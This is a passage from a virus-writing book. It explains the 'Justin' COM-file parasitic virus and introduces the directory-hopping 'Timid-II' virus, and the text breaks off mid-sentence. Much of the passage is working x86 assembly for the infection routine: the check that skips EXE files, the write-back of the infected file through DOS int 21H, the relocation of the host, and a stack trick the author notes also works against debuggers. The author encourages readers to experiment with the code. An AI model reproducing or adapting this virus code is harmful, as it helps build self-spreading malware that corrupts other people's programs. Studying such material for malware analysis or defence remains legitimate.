Checking for EXE's is really quite simple. One need only see if the first two bytes are "MZ". If they are, it's probably an EXE, so the virus should stay away! FILE_OK just checks
cmp WORD PTR [HOST],'ZM'
and exits with c set if this instruction sets the z flag. Finally, FILE_OK will close the file if it isn't a good one to infect, and leave it open, with the handle in bx, if it can be infected. It's left open so the infected version can easily be written back to the file.
Now, if FIND_FILE has located a file to infect, the actual process of infecting is simple. The image of the infected file is already in memory, so Justin simply has to write it back to disk. To do that, Justin resets the file pointer to the start of the file again, and uses DOS Function 40H to write the infected host to the file. The size of the host is passed to INFECT_FILE from FILE_OK in dx, and bx still contains the file handle. To the host size, INFECT_FILE adds the size of the virus, OFFSETHOST-100H, and writes from offset 100H in the high segment,
pop cx ;original host size to cx
add cx,OFFSET HOST - 100H ;add virus size to it
mov dx,100H ;start of infected image
mov ah,40H ;write file
int 21H
Close the file and the infection is complete.
The last thing Justin has to do is execute the original host program to which the virus was attached. The new host which was just infected is stored in the high segment, where the virus is now executing. The original host is stored in the lower segment. In order for the original host to execute properly, it must be moved down from OFFSET HOST to 100H, where it would have been loaded had it been loaded by DOS in an uninfected state. Since Justin doesn't know how big the original host was, it must move everything from OFFSET HOST to the bottom of the stack down (Fig. 5.5). That will take care of any size host. Justin must be careful not to move anything on the stack itself, or it could wipe out the stack and cause a system crash. Finally, Justin transfers control to the host using a far return. The code to do all of this is given by:
mov di,100H ;move host to low memory
mov si,OFFSET HOST
mov ax,ss ;ss points to low seg still
mov ds,ax ;set ds and es to point there
mov es,ax
push ax ;push return address
push di ;to execute host (for later)
mov cx,sp
sub cx,OFFSET HOST ;cx = bytes to move
rep movsb ;move host to offset 100H
retf ;and go execute it
There! The host gets control and executes as if nothing were different.
Fig. 5.5: Moving the host back in place.
One special case that Justin also must pay attention to is when there isn't enough memory to create a high segment. In this case, it must move the host to offset 100H without executing in a new segment. This presents a problem, because when Justin moves the host, it must overwrite itself (including any code in its body that is doing the moving).
To complete a move, and transfer control to the host, Justin must dynamically put some code somewhere that won't be overwritten. The only two safe places are (1) the PSP, and (2) on the stack. Justin opts for the latter. Using the code:
mov ax,00C3H ;put "ret" on stack
push ax
mov ax,0A4F3H ;put "rep movsb" on stack
push ax
Justin dynamically sets up some instructions just below the stack. These instructions are simply:
rep movsb ;move the host
ret ;and execute host
Then Justin moves the stack up just above these instructions:
add sp,4
Here, we find two words on the stack:
[0100H]
[FFF8H]
The first is the address 100H, used to return from the subroutine just placed on the stack to offset 100H, where the host will be. The next is the address of the routine hiding just under the stack. Justin will return to it, let it execute, and in turn, return to the host. (See Figure 5.6)
Granted, this is a pretty tricky way to go about moving the host. This kind of gymnastics is necessary though. And it has an added benefit: the code hiding just below the stack will act as an anti-debugging measure. Notice how Justin turns interrupts off with the cli instruction just before returning to this subroutine to move the host? If any interrupt occurs while executing that code, the stack will wipe the code out and the whole thing will crash. Well, guess what stepping through this code with a debugger will do? Yep, it generates interrupts and wipes out this code. Try it and you'll see what I mean.
Fig. 5.6: Stack Detail for Move.
00FC: rep movsb
00FE: jmp 100H
0100: (HOST will be here)
In the virus you set up the si, di and cx registers, and jump from the main body of the virus to offset 00FCH, and the host will execute. Try this. Why do you need the jump instruction on 386 and above processors, but not on 8088-based machines?
The Justin virus in the last chapter illustrates many of the basic techniques used by a parasitic virus to infect COM files. It is a simple yet effective virus. As we mentioned in the last chapter, however, there is another important type of non-resident parasitic virus worth looking at: one which places itself at the end of a host program. Many viruses are of this type, and it can have advantages in certain situations. For example, on computers with slow disks, or when infecting files on floppy disks, viruses which put themselves at the start of a program can be very slow because they must read the entire host programin from diskand write it back outagain. Viruses which reside at the end of a file only have to write their own code to disk, so they can work much faster. Likewise, because such viruses don't need a large buffer to load the host, they can operate in less memory. Although memory requirements aren't a problem in most computers, memory becomes a much more important factor when dealing with memory resident viruses. A virus which takes up a huge chunk of memory when going resident will be quickly noticed.
Timid-II is a virus modeled after the Timid virus first discussed in The Little Black Book of Computer Viruses. Timid-II is more aggressive than Justin, in that it will not remain in the current directory. If it doesn't find a file to infect in the current directory, it will search other directories for files to infect as well.
In case you read that last sentence too quickly, let me repeat it for you: This virus can jump directories. It can get away from you. So be careful if you experiment with it!
Non-destructive viruses which infect COM files generally must execute before the ho